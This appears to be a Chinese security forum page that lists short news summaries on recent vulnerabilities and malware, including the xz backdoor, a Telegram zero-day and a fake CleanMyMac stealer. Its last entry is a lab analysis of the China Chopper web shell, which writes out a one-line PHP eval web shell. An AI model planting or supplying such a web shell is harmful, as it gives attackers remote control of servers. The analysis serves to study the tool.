![求助,服务器安装了d,[已解决,结贴]](https://www.t00ls.com/attachments/month_2404/24040919584912a8a199f08346.jpg)
Telegram 修复了可以启动 Python 脚本的 Windows 零日漏洞
Telegram 修复了其 Windows 桌面应用程序中的一个零日漏洞,该漏洞可用于绕过安全警告并自动启动 Python 脚本。过去几天, 有关 Windows 版 Telegram 中涉嫌远程代码执行漏洞的谣言在 X 和黑客论坛上流传。虽然其中一些帖子声称这是一个零点击缺陷,但演示所谓的安全警告绕过和 RCE 漏洞的视频清楚地显示有人点击共享媒体 ...
号外号外!大家一定来看看!GitHub 骗局诱骗开发人员下载恶意软件
Checkmarx在与 The Hacker News 分享的一份报告中表示,开源软件供应链的最新攻击是在 Microsoft Visual Code 项目文件中隐藏恶意代码,这些代码会从远程 URL 下载下一阶段的负载。安全研究员 Yehuda Gelb 表示:“攻击者使用流行的名称和主题创建恶意存储库,使用自动更新和假星等技术来提高搜索排名并欺骗用户。” 这个想 ...
超过 90,000 台 LG 智能电视可能遭受远程攻击
Bitdefender 的安全研究人员发现了四个漏洞,影响多个版本的 WebOS(LG 智能电视使用的操作系统)。这些缺陷可以对受影响的模型进行不同程度的未经授权的访问和控制,包括授权绕过、权限升级和命令注入。潜在的攻击取决于使用在端口 3000/3001 上运行的服务在设备上创建任意帐户的能力,该服务可用于使用 PIN 的智能手机连 ...
新的Linux漏洞可能导致用户密码泄露和剪贴板劫持
影响 util-linux 软件包“wall”命令漏洞的详细信息已经出现,坏人可能会利用该漏洞泄露用户密码或更改某些 Linux 版本的剪贴板。 该漏洞编号为 CVE-2024-28085,安全研究员 Skyler Ferrante将其代号名命名为WallEscape 。它被描述为转义序列不正确中和的情况。 费兰特说:“util-linux wall 命令不会从命令 ...
恶意代码潜伏三年,差点引发核末日?后门投毒黑客身份成谜
开源软件xz被植入后门事件,引发了安全界的轩然大波。研究人员惊恐地发现,在包括Red Hat和Debian在内的多个广泛使用的Linux版本中,一款压缩工具被悄悄植入了恶意代码!微软的安全研究员Andres Freund首次报告了这件事。他发现,在这款名为xz Utils的工具的5.6.0和5.6.1版本中,都含有恶意代码。而且,这段恶意代码极其复 ...
近期有黑客分发假冒CleanMyMac应用,可窃取 Mac 用户数据
MacPaw 公司近日发布新闻稿,表示旗下网络安全部门 Moonlock 近期调查过程中,发现有黑客分发假冒的 CleanMyMac 应用,用于窃取 Mac 用户的数据。这款假冒 CleanMyMac 应用使用各种方法渗透进入 Mac、隐藏其存在并窃取信息。该假冒应用会收集 Mac 设备的详细信息,例如用户近期访问的文件,上网记录等等,而且会掩盖其踪迹 ...
菜刀工作原理分析
环境:1.xp1:192.168.110.132(受害机)PHPnow 1.5.6 Wireshark1.12.02.xp2:192.168.110.129(攻击机)中国菜刀201008123.Kali:192.168.110.128Python 2.7.3过程首先,我们在xp1中的web目录下写入一句话<?php eval($_POST[‘wood’]);?>,保存为1.php。然后我们用菜刀连接上,并配置好数据库管理信息。0x01目录管理我们在xp1抓包获取如下信息:[code]POST /1.php HTTP/1.1X-Forwarded-For: 19 ...
T00ls.Com版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。
Copyright © 2008 - 2024 T00ls All Rights Reserved.